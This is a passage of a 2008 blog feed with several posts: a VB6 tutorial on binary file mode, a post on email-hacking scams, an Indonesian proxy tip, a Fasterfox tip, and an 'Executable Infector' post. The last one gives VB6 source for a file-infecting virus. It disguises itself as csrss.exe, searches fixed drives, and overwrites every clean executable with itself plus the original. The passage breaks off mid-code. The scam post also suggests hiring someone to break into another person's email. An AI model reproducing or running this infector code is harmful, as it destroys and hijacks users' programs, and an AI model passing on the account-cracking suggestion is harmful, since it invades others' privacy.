src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5036191006047919581</id><published>2008-09-29T15:35:00.000+07:00</published><updated>2008-09-29T15:43:24.694+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VB'/><title type='text'>Simple Binary</title><content type='html'>The reader is expected to have read the first part of this tutorial which deals&lt;br /&gt;with sequential files. You can still follow this tutorial without reading Part-I,&lt;br /&gt;but I recommend reading the sequential files tutorial first because I may have mentioned certain things in Part-I which also apply to Binary Files.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;As far as Visual Basic 6 is concerned, there are three modes in which a file can&lt;br /&gt;be accessed.&lt;br /&gt;&lt;br /&gt;   1. Text Mode (Sequential Mode)&lt;br /&gt;   2. Binary Mode&lt;br /&gt;   3. Random Access Mode&lt;br /&gt;&lt;br /&gt;In the Text Mode, data is ALWAYS written and retrieved as CHARACTERS.&lt;br /&gt;Hence, any number written in this mode will result in the ASCII Value of the&lt;br /&gt;number being stored.&lt;br /&gt;For Example, The Number 17 is stored as two separate characters "1" and "7".&lt;br /&gt;Which means that 17 is stored as [ 49 55 ] and not as [ 17 ].&lt;br /&gt;&lt;br /&gt;In the Binary Mode, everything is written and retrieved as a Number.&lt;br /&gt;Hence, The Number 17 Will be stored as [ 17 ] in this mode and&lt;br /&gt;characters will be represented by their ASCII Value as always.&lt;br /&gt;&lt;br /&gt;One major difference between Text Files and Binary Files is that Text Files&lt;br /&gt;support Sequential Reading and Writing. This means that we cannot read or write&lt;br /&gt;from a particular point in a file. The only way of doing this is to read through&lt;br /&gt;all the other entries until you reach the point where you want to 'actually'&lt;br /&gt;start reading.&lt;br /&gt;&lt;br /&gt;Binary Mode allows us to write and read anywhere in the file. For example we can&lt;br /&gt;read data directly from the 56th Byte of the file, instead of reading all the&lt;br /&gt;bytes one by one till we reach the 56th byte.&lt;br /&gt;&lt;br /&gt;Part-I dealt with Sequential Files, and this one will teach you how to read and&lt;br /&gt;write files in Binary Mode.&lt;br /&gt;&lt;br /&gt;You will often come across the terms "Text Files", "Sequential Files",&lt;br /&gt;"Sequential Mode", "Binary Mode" and "Binary Files" while reading books,&lt;br /&gt;articles or even posts on the internet related to file handling and wonder what&lt;br /&gt;they really mean.&lt;br /&gt;&lt;br /&gt;A file is a set of bytes/records stored together.&lt;br /&gt;&lt;br /&gt;Text Files are files which contain only characters in ASCII or Unicode.&lt;br /&gt;&lt;br /&gt;Sequential Files are files opened in Sequential Mode.&lt;br /&gt;&lt;br /&gt;Sequential Mode refers to any of the modes used for sequential file handling&lt;br /&gt;which are Input, Output and Append.&lt;br /&gt;&lt;br /&gt;Binary Mode refers to the Binary Mode [which you shall learn about as you&lt;br /&gt;progress through this tutorial]&lt;br /&gt;&lt;br /&gt;Binary Files refer to files opened in Binary Mode.&lt;br /&gt;&lt;br /&gt;You should note that Binary Files and Sequential Files are not different kinds&lt;br /&gt;of files but rather different methods of accessing a file.&lt;br /&gt;&lt;br /&gt;Any file can be opened in both sequential and binary modes (obviously not at the&lt;br /&gt;same time wink2.gif ). If it is opened in sequential mode, you will only be able to&lt;br /&gt;access data in the file sequentially. If it's opened in Binary mode, you can&lt;br /&gt;access any byte in the file without reading the previous bytes in the file.&lt;br /&gt;&lt;br /&gt;example :&lt;br /&gt;&lt;br /&gt;   1. Add a Command Button with name as Command1 onto a Form  &lt;br /&gt;   2. Private Sub Command1_Click()  &lt;br /&gt;   3.    Dim f As Long  &lt;br /&gt;   4.    f = FreeFile()  &lt;br /&gt;   5.   &lt;br /&gt;   6.    Open "c:\test.txt" For Binary As #f  &lt;br /&gt;   7.    Close #f  &lt;br /&gt;   8. End Sub  &lt;br /&gt;&lt;br /&gt;view plainprint?&lt;br /&gt;&lt;br /&gt;   1. 'Add a Command Button with name as Command1 onto a Form  &lt;br /&gt;   2. Private Sub Command1_Click()  &lt;br /&gt;   3.    Dim f As Long  &lt;br /&gt;   4.    f = FreeFile()  &lt;br /&gt;   5.   &lt;br /&gt;   6.    Open "c:\test.txt" For Binary As #f  &lt;br /&gt;   7.    Close #f  &lt;br /&gt;   8. End Sub  &lt;br /&gt;&lt;br /&gt;As you can see, the FreeFile() function can also be used for binary files.&lt;br /&gt;The Open Statement opens c:\test.txt in Binary Mode and the next statement&lt;br /&gt;closes the file.&lt;br /&gt;&lt;br /&gt;As obvious as it may sound, you need to open a file before using it and close it&lt;br /&gt;when you have finished reading or writing to it. Many programmers forget to add&lt;br /&gt;the Close statement which results in the File Already Open Error, and it can be&lt;br /&gt;a pain to track down the exact location that caused the error when you're&lt;br /&gt;dealing with many files.&lt;br /&gt;&lt;br /&gt;You should note that this snippet does more than open and close a file.&lt;br /&gt;If the test.txt file is not present in C drive, then it creates a blank file&lt;br /&gt;with the same name.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5036191006047919581?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5036191006047919581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5036191006047919581'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/09/simple-binary.html' title='Simple Binary'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1060501577845158689</id><published>2008-09-08T01:31:00.000+07:00</published><updated>2008-10-03T10:40:14.364+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Hacking Yahoo, Hotmail, Lycos...</title><content type='html'>Computer Hackers nowadays offers different services - and the most widely offered is to crack into email passwords such as Yahoo, Hotmail, Gmail, AOL, Lycos and so on. Some are really good but most are just scams.&lt;br /&gt;&lt;br /&gt;The most common and successful method is achieved with the use of keyloggers to record any email passwords and computer surveillance software. 100 percent sure, makers of this application often called it that way, not a "hacking program."&lt;br /&gt;&lt;br /&gt;Recently, forums are flooded with different offers from so called email hackers. Are you sure they are really hackers and have success on the task you will be giving them?&lt;span class=""&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Beware of Scams&lt;br /&gt;Step-by-step Yahoo hacking!!! So many have been victimized by this, sending their passwords and hoping that they can retrieved a targeted account by following these:&lt;br /&gt;&lt;br /&gt;It goes this way:&lt;br /&gt;Log in to your own yahoo account. Compose an e-mail to: recoversecretcode@yahoo.com. The automated server will send you the password that you have 'forgotten', after receiving the information you send them. STEP 3- In the subject line type exactly: password retrieve...etc, etc...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Don't fall into this. It's a real scam. The only way to recover your password is going to your email account, check for" forgot="" password="" and="" will="" ask="" you="" for="" authentication="" before="" it="" resets="" your=""&gt;&lt;br /&gt;&lt;br /&gt;In Yahoo for example, it will prompt for "secret questions" which you have filled during your sign-up. Thereafter the original passwords will be emailed to your alternate email account, which also you have provided during sign-up. It is very important to keep those "sign-up" information for your future use.&lt;br /&gt;&lt;br /&gt;Scammers common trick is to ask users to send money before they start the process. Most of them are generating large amount of money with this, but no results or job is done in the end. You will end up a victim.&lt;br /&gt;&lt;br /&gt;If there is a great need for you to retrieved someone's email password, there are some who can provide it for you, choose the best, someone who will send you proofs such as screenshots of inbox, sent items or address book before they ask for payment. Though, we never advise you to resort into this, it is still invading others privacy no matter how you accomplished it.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1060501577845158689?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1060501577845158689'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1060501577845158689'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/09/hacking-yahoo.html' title='Hacking Yahoo, Hotmail, Lycos...'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6383338537367971452</id><published>2008-07-20T23:41:00.001+07:00</published><updated>2008-07-20T23:41:56.263+07:00</updated><title type='text'>Cara nambah speed koneksi &amp; rubah IP biar CEPAT &amp; super AMAN (Limited) GRATIS!</title><content type='html'>&lt;p class="MsoNormal"&gt;Ni info bagus dari temen,udah saya coba..ok banget.. -&gt;&lt;br /&gt;Bagi yg suka buka web/download file sering nemuin keadaan kyk gini :&lt;br /&gt;1. Akses lama, koneksi lelet &amp;amp; timeout.&lt;br /&gt;2. Hasil download sering error.&lt;br /&gt;3. Frekuensi download dibatasi (kyk di rapidshare, dll).&lt;br /&gt;4. IP kita dibanned / dilarang ngunjungi.&lt;br /&gt;5. Takut alamat IP qt dicatat.&lt;br /&gt;&lt;br /&gt;Dan kita berharap :&lt;br /&gt;1. Koneksi lebih CEPAT (misalnya untuk akses &lt;a href="https://%29/" target="_blank"&gt;https://)&lt;/a&gt; .&lt;br /&gt;2 . Koneksi lebih AMAN (alamat IP qt 100% berubah, HIGH ANONYMITY).&lt;br /&gt;3. Bisa download lebih banyak TANPA DIBATASI (mgkn bisa tak terbatas, tergantung settingan cookies).&lt;br /&gt;4. Bisa mengunjungi website TANPA KHAWATIR dibanned lagi.&lt;br /&gt;5. Surfing BEBAS gak perlu was-was lagi.&lt;br /&gt;&lt;br /&gt;Semua tadi bisa didapatkan dengan pake tool online GRATIS&lt;br /&gt;(GA PERLU DOWNLOAD/INSTALL utk pakenya) di:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://freeproxy.co.cc/" target="_blank"&gt;http://freeproxy.co.cc&lt;/a&gt;&lt;br /&gt;(jangan lupa utk bookmark!)&lt;br /&gt;&lt;br /&gt;Cukup dengan memasukkan alamat web/URL yang pingin kita tuju trus klik Go!&lt;br /&gt;Semua koneksi yang kita lakukan akan lebih cepat &amp;amp; aman.&lt;br /&gt;&lt;st1:city st="on"&gt;Ada&lt;/st1:City&gt; 1 hal lagi paling seru, bahwa alamat koneksi / IP qt akn berubah menjadi IP &lt;st1:place st="on"&gt;&lt;st1:country-region st="on"&gt;USA&lt;/st1:country-region&gt;&lt;/st1:place&gt;.&lt;br /&gt;&lt;br /&gt;Untuk cek IP anda bisa dengan mengunjungi website :&lt;br /&gt;&lt;a href="http://www.proxydetect.com/" target="_blank"&gt;www.proxydetect.com&lt;/a&gt; &amp;amp; &lt;a href="http://www.showip.net/" target="_blank"&gt;www.showip.net&lt;/a&gt;&lt;br /&gt;Silahkan buka lakukan sebelum &amp;amp; sesudah menggunakan tool ini.&lt;br /&gt;Nnti akan kelihatan perbedaan IP (alamat koneksi kita) yg kita pke.&lt;br /&gt;&lt;br /&gt;Slain itu utk buka situs https jg lebih cepet.&lt;br /&gt;Karena saat mngunjungi situs yg urlnya https,&lt;br /&gt;tool ini tetep jln karena qt buka tool ini tanpa hrs ngrubah ke https pula.&lt;br /&gt;Slain itu koneksi qt tetep aman krn komunikasi qt akn tetep dienskripsi!&lt;br /&gt;Tool ini menggunakan script cgi (common gateway interface) dg cgiproxy&lt;br /&gt;sbg enginenya. Yaitu merupakan script yg opensource &amp;amp; licence-nya&lt;br /&gt;udh kedaftar ke GNU (&lt;a href="http://www.gnu.org/" target="_blank"&gt;www.gnu.org&lt;/a&gt;). Jadi, qt ga perlu takut / khawatir utk makenya.&lt;br /&gt;&lt;br /&gt;Jika anda suka, silahkan bookmark alamat web ini online di del.icio.us&lt;br /&gt;jadi anda bisa mmbukanya dimana aja tanpa hrs melihat catatan bookmark anda.&lt;br /&gt;&lt;br /&gt;Ok, itu aja info gratisnya&lt;br /&gt;Maaf bila ada salah kata, sekedar share agar kita bs manfaatin sbaik2nya.&lt;br /&gt;Smoga bermanfaat buat rekan2 disini.&lt;br /&gt;Keep freedom to surf!!!&lt;br /&gt;Smoga berkenan...&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6383338537367971452?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6383338537367971452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6383338537367971452'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/07/cara-nambah-speed-koneksi-rubah-ip-biar.html' title='Cara nambah speed koneksi &amp; rubah IP biar CEPAT &amp; super AMAN (Limited) GRATIS!'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5198079343738677720</id><published>2008-06-30T15:21:00.000+07:00</published><updated>2008-06-30T15:23:19.310+07:00</updated><title type='text'>Berselancar Lebih Cepat dengan Fasterfox</title><content type='html'>&lt;p style="color: rgb(51, 51, 255);" class="MsoNormal"&gt;Firefox oleh banyak orang dianggap sebagai browser yang cukup cepat. Namun, ada saja yang menganggap masih kurang cepat, untungnya telah banyak upaya yang dilakukan untuk mempercepat kinerja firefox yang sudah cepat ini. Salah satunya adalah melalui plug-ins Fasterfox. &lt;/p&gt;  &lt;p style="color: rgb(51, 51, 255);"&gt;Karena sifat firefox yang opensource, banyak orang ‘pintar’ yang dapat ikut andil dalam mengembangkan kinerja si Rubah Api ini. Salah satu upaya untuk meningkatkan kinerja firefox adalah dengan melakukan tweaking. Itulah yang dilakukan oleh plug-ins fasterfox. Fasterfox mempercepat proses browsing dengan memanfaatkan Prefect links dan Network Tweaking. Melalui Prefect Links, tidak ada lagi bandwith menganggur karena firefox akan mengambil dan menyimpan halaman web sebagai cache. Proses transfer halaman web ini dilakukan dilatar belakang sehingga tidak mengganggu aktifitas browsing anda.&lt;/p&gt;  &lt;p style="color: rgb(51, 51, 255);"&gt;Tweaking Network dilakukan pada seting untuk rendering halaman, koneksi simultan, pipelining,cache, DNS-cache, dan IPD (initial paint delay). Selain itu di dalam fasterfox juga telah terintegrasi sebuah pop-up blocker untuk pop-up yang dihasilkan oleh objek flash.&lt;/p&gt;  &lt;p style="color: rgb(51, 51, 255);"&gt;Untuk menginstalasikan plug-ins fasterfox anda dapat mendownloadnya di &lt;a href="http://fasterfox.mozdev.org/"&gt;http://fasterfox.mozdev.org/&lt;/a&gt; , Setelah plug-ins terinstalasi, restart firefox untuk mengaktifkannya. Buka menu Tools | Add-ons, lalu klik ganda plug-ins fasterfox untuk membuka option yang tersedia. Fasilitas tersebut adalah pilihan Default, Courteous, Optimized, Turbo Charged, dan Custom.&lt;/p&gt;  &lt;p style="color: rgb(51, 51, 255);"&gt;Pilihan default akan mengembalikan semua setingan ke kondisi semula. Pilihan Courteous hanya melakukan tweaking pada proses rendering sehingga tidak akan membebani webserver. Pilihan Optimized akan melakukan tweaking optimum dalam batasan yang diizinkan oleh RFC. Pilihan Turbo Charged adalah pilihan yang paling ekstrem, ia akan melakukan tweaking seoptimal mungkin dengan mengabaikan batasan yang diizinkan.&lt;/p&gt;  &lt;p style="color: rgb(51, 51, 255);"&gt;Turbo Charged dapat menjadi pilihan utama bagi anda yang berbagi jalur internet, sedang jika anda seorang yang bijaksana, Courteous dan Optimized adalah pilihan yang tepat. Dengan memilih custom anda dapat mengatur aspek-aspek tweaking secara lebih terperinci. Disini anda dapat mengatur langsung besarnya cache yang akan digunakan, banyaknya koneksi simultan ke sebuah web server, jumlah pipelining, banyaknya halaman fastback, dan menghidupkan/mematikan pop-up blocker.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5198079343738677720?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5198079343738677720'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5198079343738677720'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/06/berselancar-lebih-cepat-dengan.html' title='Berselancar Lebih Cepat dengan Fasterfox'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-4331181129015908333</id><published>2008-06-25T22:25:00.000+07:00</published><updated>2008-10-03T10:42:23.303+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VB'/><title type='text'>infector</title><content type='html'>&lt;p class="MsoNormal" style="text-align: center; color: rgb(0, 102, 0);" align="center"&gt;&lt;b style=""&gt;Executable Infector&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;b style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;b style=""&gt;This is the only one of its kind..&lt;br /&gt;But there is a new Update i made for the previous method.&lt;br /&gt;now you can easily extract (an) icon of the original EXE and save it to the Infected EXE&lt;br /&gt;note that if The Original EXE has more than one Icon .. we can't specify The main icon in this case.. so we will extract any icon and save it to the infected EXE&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;b style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;Add :&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-indent: 36pt; color: rgb(0, 102, 0);"&gt;The Infector Routine depends on The everlasting method&lt;br /&gt;           &gt;&gt;&gt;&gt; My Application&lt;span style=""&gt;  &lt;/span&gt;+ Original EXE &lt;&lt;&lt;&lt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-indent: 36pt; color: rgb(0, 102, 0);"&gt;And will be exploring original EXE on drives, be carefull !!!&lt;b style=""&gt;&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;b style=""&gt;CODE : ( VB Language )&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;b style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;Dim sPath As String&lt;br /&gt;Dim sOPath As String&lt;br /&gt;Dim sData As String&lt;br /&gt;Dim VirusData As String&lt;br /&gt;Dim FinalEXE As String&lt;br /&gt;Dim lStart As Long&lt;br /&gt;Dim lEnd As Long&lt;br /&gt;Dim sLen As Long&lt;br /&gt;Dim sIcon As String&lt;br /&gt;&lt;br /&gt;Private Sub Form_Load()&lt;br /&gt;app.TaskVisible = False&lt;br /&gt;&lt;br /&gt;If App.PrevInstance = True Then End&lt;br /&gt;&lt;br /&gt;'## Begin OF Dropping&lt;br /&gt;&lt;br /&gt;sPath = AddBackSlash(App.Path) &amp;amp; App.EXEName &amp;amp; ".exe"&lt;br /&gt;sOPath = AddBackSlash(App.Path) &amp;amp; App.EXEName &amp;amp; ".MFF"&lt;br /&gt;&lt;br /&gt;If LCase(sPath) = LCase(Environ$("WinDir") &amp;amp; "\csrss.exe") Then&lt;br /&gt;&lt;br /&gt;Else&lt;br /&gt;&lt;br /&gt;Open sPath For Binary As #1&lt;br /&gt;sData = Space(LOF(1))&lt;br /&gt;Get #1, , sData&lt;br /&gt;&lt;br /&gt;lStart = InStr(25000, sData, "|||||")&lt;br /&gt;&lt;br /&gt;If lStart &gt; 0 Then&lt;br /&gt;lStart = lStart + 5&lt;br /&gt;sData = Mid(sData, lStart)&lt;br /&gt;Open sOPath For Binary As #2&lt;br /&gt;Put 2, , sData&lt;br /&gt;Close 2&lt;br /&gt;If Command$ = "" Then&lt;br /&gt;Shell sOPath, vbNormalFocus&lt;br /&gt;Else&lt;br /&gt;Shell sOPath &amp;amp; " " &amp;amp; Command$, vbNormalFocus&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;Close 1&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;'## End OF Dropping&lt;br /&gt;&lt;br /&gt;'@@@@@@@@@@@@@@@@@@@@@@@@@&lt;br /&gt;&lt;br /&gt;If Dir(Environ$("WinDir") &amp;amp; "\csrss.exe") = "" Then&lt;br /&gt;sPath = AddBackSlash(App.Path)&lt;br /&gt;FileCopy sPath &amp;amp; App.EXEName &amp;amp; ".exe", Environ$("WinDir") &amp;amp; "\csrss.exe"&lt;br /&gt;While Dir(Environ$("WinDir") &amp;amp; "\csrss.exe") = ""&lt;br /&gt;DoEvents&lt;br /&gt;Wend&lt;br /&gt;Shell Environ$("WinDir") &amp;amp; "\csrss.exe"&lt;br /&gt;End&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;If LCase(sPath) = LCase(Environ$("WinDir") &amp;amp; "\csrss.exe") Then&lt;br /&gt;&lt;br /&gt;'Do nothing&lt;br /&gt;Else&lt;br /&gt;&lt;br /&gt;Shell Environ$("WinDir") &amp;amp; "\csrss.exe"&lt;br /&gt;End&lt;br /&gt;End If&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;br /&gt;'#########################&lt;br /&gt;&lt;b style=""&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Call GetDrives&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;&lt;br /&gt;End Sub&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;'#########################&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 102, 0);" class="MsoNormal"&gt;' Sub GetDrives()&lt;br /&gt;Dim ObjFSO As Object&lt;br /&gt;Dim Drives As Object&lt;br /&gt;Dim sDrive As Object&lt;br /&gt;Set ObjFSO = CreateObject("Scripting.FileSystemObject")&lt;br /&gt;&lt;br /&gt;Set Drives = ObjFSO.Drives&lt;br /&gt;For Each sDrive In Drives&lt;br /&gt;If sDrive.DriveType = 2 Then&lt;br /&gt;MsgBox sDrive &amp;amp; "\"&lt;br /&gt;GetEXEs (sDrive &amp;amp; "\")&lt;br /&gt;GetFolders (sDrive &amp;amp; "\")&lt;br /&gt;End If&lt;br /&gt;Next&lt;br /&gt;End Sub&lt;br /&gt;&lt;br /&gt;Function GetFolders(Folder As String)&lt;br /&gt;Dim ObjFSO As Object&lt;br /&gt;Dim sFolder As Object&lt;br /&gt;Set ObjFSO = CreateObject("Scripting.FileSystemObject")&lt;br /&gt;For Each sFolder In ObjFSO.GetFolder(Folder).SubFolders&lt;br /&gt;DoEvents&lt;br /&gt;Call GetEXEs(sFolder.Path)&lt;br /&gt;Call GetFolders(sFolder.Path)&lt;br /&gt;Next&lt;br /&gt;End Function&lt;br /&gt;&lt;br /&gt;Function GetEXEs(Path As String)&lt;br /&gt;Dim exes As String, EXEPath As String&lt;br /&gt;&lt;br /&gt;If Right(Path, 1) &lt;&gt; "\" Then Path = Path &amp;amp; "\"&lt;br /&gt;EXEPath = Dir$(Path &amp;amp; "*.exe")&lt;br /&gt;While EXEPath &lt;&gt; ""&lt;br /&gt;List1.AddItem Path &amp;amp; EXEPath&lt;br /&gt;'MsgBox Path &amp;amp; EXEPath&lt;br /&gt;Call InfectEXE(Path &amp;amp; EXEPath)&lt;br /&gt;EXEPath = Dir$&lt;br /&gt;Wend&lt;br /&gt;&lt;br /&gt;End Function&lt;br /&gt;&lt;br /&gt;Function InfectEXE(EXEPath As String)&lt;br /&gt;Me.Visible = True&lt;br /&gt;On Error Resume Next&lt;br /&gt;Dim Check As Boolean&lt;br /&gt;Check = False&lt;br /&gt;&lt;br /&gt;Dim s As String, ss As String, sss As String&lt;br /&gt;Dim sNulls As String&lt;br /&gt;Dim sLenICOINEXE As Long&lt;br /&gt;Dim sLenDif As Long&lt;br /&gt;Dim sLenTemp As String&lt;br /&gt;Dim sTemp As String&lt;br /&gt;&lt;br /&gt;s = "1u" &amp;amp; "(" &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; " " &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; "@"&lt;br /&gt;ss = "(" &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; " " &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; "@"&lt;br /&gt;sss = "3u(" &amp;amp; Chr$(0) '&amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0) &amp;amp; Chr$(0)&lt;br /&gt;&lt;br /&gt;For i = 1 To 296  ' Generate 296 Nulls to change 16*16 icon&lt;br /&gt;sNulls = sNulls &amp;amp; Chr$(0)&lt;br /&gt;Next&lt;br /&gt;&lt;br /&gt;'First we will check if it is already infected&lt;br /&gt;Open EXEPath For Binary As #1&lt;br /&gt;sData = Space(LOF(1))&lt;br /&gt;Get 1, , sData&lt;br /&gt;Close 1&lt;br /&gt;If InStr(25000, sData, "|||||") Then&lt;br /&gt;'it is infected then do nothing&lt;br /&gt;Else&lt;br /&gt;'it is clean so try to infect it&lt;br /&gt;Kill EXEPath&lt;br /&gt;&lt;br /&gt;sIcon = GetIconFromEXE(sData, Check)&lt;br /&gt;&lt;br /&gt;If Check = True Then&lt;br /&gt;'MsgBox "Icon Found"&lt;br /&gt;&lt;br /&gt;sPath = AddBackSlash(App.Path) &amp;amp; App.EXEName &amp;amp; ".exe"&lt;br /&gt;Open sPath For Binary As #2&lt;br /&gt;VirusData = Space(LOF(2))&lt;br /&gt;Get 2, , VirusData&lt;br /&gt;Close #2&lt;br /&gt;&lt;br /&gt;i = InStr(1, VirusData, s)&lt;br /&gt;If i &lt;&gt; 0 Then '(1u found)&lt;br /&gt;VirusData = Left(VirusData, i + 1) ' get to u in (1u)&lt;br /&gt;&lt;br /&gt;VirusData = VirusData &amp;amp; sIcon&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FinalEXE = VirusData &amp;amp; "|||||" &amp;amp; sData&lt;br /&gt;Open EXEPath For Binary As #3&lt;br /&gt;Put 3, , FinalEXE&lt;br /&gt;Close 3&lt;br /&gt;&lt;br /&gt;Exit Function&lt;br /&gt;&lt;br /&gt;Else 'If (1u) not found .. try to find (3u)&lt;br /&gt;i = InStr(1, sData, sss)&lt;br /&gt;If i &gt; 0 Then&lt;br /&gt;'Debug.Print "Second Method Method... (3u found)"&lt;br /&gt;sTemp = Left(VirusData, i + 1) 'Get to (3u)&lt;br /&gt;sLenICOINEXE = Len(VirusData) - (i + 297) ' add one byte to 296 coz of (u) in (1u)&lt;br /&gt;sLenICOINICO = Len(sIcon)&lt;br /&gt;&lt;br /&gt;If sLenICOINEXE &gt; sLenICOINICO Then&lt;br /&gt;sLenDif = sLenICOINEXE - sLenICOINICO&lt;br /&gt;&lt;br /&gt;For i = 1 To sLenDif&lt;br /&gt;sLenTemp = sLenTemp &amp;amp; Chr$(0)&lt;br /&gt;Next&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;VirusData = sTemp &amp;amp; sNulls &amp;amp; sIcon &amp;amp; sLenTemp&lt;br /&gt;FinalEXE = VirusData &amp;amp; "|||||" &amp;amp; sData&lt;br /&gt;Open EXEPath For Binary As #3&lt;br /&gt;Put 3, , FinalEXE&lt;br /&gt;Close 3&lt;br /&gt;Exit Function&lt;br /&gt;End If&lt;br /&gt;End If 'for if i &lt;&gt; 0&lt;br /&gt;&lt;br /&gt;FinalEXE = VirusData &amp;amp; "|||||" &amp;amp; sData&lt;br /&gt;Open EXEPath For Binary As #3&lt;br /&gt;Put 3, , FinalEXE&lt;br /&gt;Close 3&lt;br /&gt;&lt;br /&gt;Else ' Means Check = False&lt;br /&gt;'virus icon is default for the final EXE&lt;br /&gt;sPath = AddBackSlash(App.Path) &amp;amp; App.EXEName 